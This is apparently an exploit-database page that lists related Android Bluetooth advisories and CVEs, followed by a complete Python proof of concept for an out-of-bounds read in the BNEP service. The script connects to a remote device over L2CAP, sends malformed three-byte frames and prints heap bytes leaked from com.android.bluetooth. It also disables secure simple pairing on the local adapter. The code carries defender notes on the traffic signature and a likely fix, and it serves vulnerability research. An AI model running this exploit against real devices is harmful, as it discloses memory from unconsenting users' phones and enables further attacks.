| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
| Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit | 23 Mar 201800:00 | – | zdt | |
| Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit | 23 Mar 201800:00 | – | zdt | |
| Android Security Bulletin—March 2018 | 5 Mar 201800:00 | – | androidsecurity | |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06622) | 7 Mar 201800:00 | – | cnvd | |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06624) | 7 Mar 201800:00 | – | cnvd | |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06625) | 7 Mar 201800:00 | – | cnvd | |
| Google Android System Component Information Disclosure Vulnerability (CNVD-2018-06626) | 7 Mar 201800:00 | – | cnvd | |
| CVE-2017-13258 | 4 Apr 201817:00 | – | cve | |
| CVE-2017-13260 | 4 Apr 201817:00 | – | cve | |
| CVE-2017-13261 | 4 Apr 201817:00 | – | cve |
`import os
import sys
import struct
import bluetooth
# L2CAP PSM used by leak() when it connects to the remote BNEP service.
BNEP_PSM = 0x000F
# BNEP packet type placed in the low 7 bits of the first header byte.
BNEP_FRAME_COMPRESSED_ETHERNET = 0x02
# Number of probe packets sent; probe number i carries i as its length byte.
LEAK_ATTEMPTS = 20
def leak(src_bdaddr, dst):
    """Send LEAK_ATTEMPTS malformed BNEP frames to *dst* and print each result.

    Proof of concept for an out-of-bounds read in the BNEP receive path of
    com.android.bluetooth. According to the original author's notes, the
    receiver advances its parse pointer ``p`` by the length byte taken from
    the packet and then echoes the byte found there inside a 3-byte
    "command not understood" control reply, but only when that byte is
    greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06).

    Defender notes:
      * On the wire each probe is a 3-byte frame that Wireshark labels
        "Compressed Ethernet+E - Type: unknown[Malformed packet]"; a burst
        of these from one peer is the observable signature of this probe.
      * NOTE(review): the fix is presumably a check of the extension length
        against the bytes remaining in the packet before ``p`` is
        dereferenced -- confirm against the vendor patch.

    Args:
        src_bdaddr: address of the local adapter the socket is bound to.
        dst: address of the remote device running the BNEP service.
    """
    sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    sock.settimeout(5)
    sock.bind((src_bdaddr, 0))

    print('Connecting to BNEP...')
    sock.connect((dst, BNEP_PSM))
    # A shorter timeout from here on: a missing reply is an expected outcome.
    sock.settimeout(1)

    print('Leaking bytes from the heap of com.android.bluetooth...')

    # First header byte: 0x82 & 0x80 == 0x80 sets the extension flag and
    # 0x82 & 0x7f == 0x2 selects the compressed-Ethernet packet type.
    type_and_ext_present = BNEP_FRAME_COMPRESSED_ETHERNET | 0x80
    # Extension header byte: 0x80 satisfies the receiver's !(ext & 0x7f) check.
    ext = 0x80

    for offset in range(LEAK_ATTEMPTS):
        # Third byte is the length by which the receiver advances 'p'.
        probe = struct.pack('<BBB', type_and_ext_present, ext, offset)
        sock.send(probe)

        # The reply built by bnep_send_command_not_understood() is:
        # 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD)
        # + the byte read at (p + offset).
        try:
            reply = sock.recv(3)
        except bluetooth.btcommon.BluetoothError:
            reply = ''

        if not reply:
            # No reply is reported as "byte <= 6"; the code does not tell this
            # apart from a receive error caused by anything else.
            print('heap[p + 0x%02x] <= 6' % (offset))
            continue
        print('heap[p + 0x%02x] = 0x%02x' % (offset, ord(reply[-1])))

    print('Closing connection.')
    sock.close()
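def main(src_bdaddr, dst):
    """Run the two local adapter commands, then call leak().

    Runs ``hciconfig <src_bdaddr> sspmode 0`` and ``hcitool dc <dst>`` before
    handing both addresses to leak().

    Both addresses come straight from the command line and the script runs
    as root, so the helper commands are executed from argument lists rather
    than an interpolated shell string: shell metacharacters in either
    argument are passed to the tool as literal text instead of being
    interpreted by /bin/sh.

    Args:
        src_bdaddr: address of the local adapter.
        dst: address of the remote device.
    """
    import subprocess  # function-scope import keeps this block self-contained

    setup_commands = (
        ['hciconfig', src_bdaddr, 'sspmode', '0'],
        ['hcitool', 'dc', dst],
    )
    for argv in setup_commands:
        try:
            # Exit status is ignored, as it was with os.system().
            subprocess.call(argv)
        except OSError as exc:
            # os.system() only reported a missing tool and carried on;
            # keep that best-effort behaviour instead of aborting here.
            print('Warning: could not run %s: %s' % (argv[0], exc))

    leak(src_bdaddr, dst)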
if __name__ == '__main__':
    # Expect two positional arguments: local adapter address, remote address.
    cli_args = sys.argv[1:]
    if len(cli_args) < 2:
        print('Usage: python bnep01.py <src-bdaddr> <dst-bdaddr>')
    elif os.getuid():
        # A non-zero uid means the script was not started as root.
        print('Error: This script must be run as root.')
    else:
        main(cli_args[0], cli_args[1])
`